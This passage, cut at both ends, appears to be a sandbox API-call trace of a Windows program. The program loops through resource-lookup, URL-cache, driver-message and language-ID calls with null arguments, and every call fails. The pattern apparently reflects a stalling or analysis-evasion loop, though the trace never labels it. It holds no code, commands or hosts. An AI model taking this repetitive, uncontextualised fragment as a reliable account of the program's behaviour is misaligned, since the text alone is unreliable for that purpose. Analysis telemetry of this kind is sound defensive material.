lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.919] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.919] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.919] GetUserDefaultLangID () returned 0x409 [0185.919] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.919] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.919] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.919] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.919] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.919] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.919] GetUserDefaultLangID () returned 0x409 [0185.919] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.919] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.919] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.919] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.919] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.919] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.919] GetUserDefaultLangID () returned 0x409 [0185.919] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.919] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.919] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.919] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.919] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.919] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.919] GetUserDefaultLangID () returned 0x409 [0185.919] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.919] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.919] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.919] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.919] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.919] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.919] GetUserDefaultLangID () returned 0x409 [0185.919] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.919] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.919] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.920] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.920] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.920] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.920] GetUserDefaultLangID () returned 0x409 [0185.920] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.920] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.920] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.920] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.920] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.920] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.920] GetUserDefaultLangID () returned 0x409 [0185.920] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.920] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.920] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.920] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.920] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.920] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.920] GetUserDefaultLangID () returned 0x409 [0185.920] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.920] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.920] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.920] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.920] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.920] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.920] GetUserDefaultLangID () returned 0x409 [0185.920] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.920] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.920] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.920] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.920] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.920] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.920] GetUserDefaultLangID () returned 0x409 [0185.920] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.920] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.920] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.920] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.920] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.920] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.920] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.920] GetUserDefaultLangID () returned 0x409 [0185.920] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.920] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.921] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.921] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.921] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.921] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.921] GetUserDefaultLangID () returned 0x409 [0185.921] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.921] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.921] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.921] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.921] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.921] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.921] GetUserDefaultLangID () returned 0x409 [0185.921] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.921] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.921] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.921] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.921] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.921] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.921] GetUserDefaultLangID () returned 0x409 [0185.921] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.921] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.921] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.921] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.921] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.921] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.921] GetUserDefaultLangID () returned 0x409 [0185.921] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.921] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.921] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.921] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.921] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.921] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.921] GetUserDefaultLangID () returned 0x409 [0185.921] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.921] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.921] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.921] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.921] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.921] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.921] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.921] GetUserDefaultLangID () returned 0x409 [0185.921] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.922] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.922] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.922] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.922] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.922] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.922] GetUserDefaultLangID () returned 0x409 [0185.922] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.922] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.922] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.922] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.922] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.922] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.922] GetUserDefaultLangID () returned 0x409 [0185.922] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.922] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.922] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.922] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.922] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.922] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.922] GetUserDefaultLangID () returned 0x409 [0185.922] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.922] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.922] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.922] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.922] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.922] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.922] GetUserDefaultLangID () returned 0x409 [0185.922] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.922] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.922] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.922] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.922] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.922] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.922] GetUserDefaultLangID () returned 0x409 [0185.922] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.922] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.922] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.922] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.922] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.922] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.922] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.922] GetUserDefaultLangID () returned 0x409 [0185.923] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.923] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.923] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.923] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.923] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.923] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.923] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.923] GetUserDefaultLangID () returned 0x409 [0185.923] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.923] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.923] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.923] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.923] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.923] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.923] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.923] GetUserDefaultLangID () returned 0x409 [0185.923] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.923] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.923] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.923] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.923] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.923] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.923] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.923] GetUserDefaultLangID () returned 0x409 [0185.923] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.923] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.923] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.923] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.923] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.923] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.923] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.923] GetUserDefaultLangID () returned 0x409 [0185.923] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.923] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.923] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.923] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.923] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, 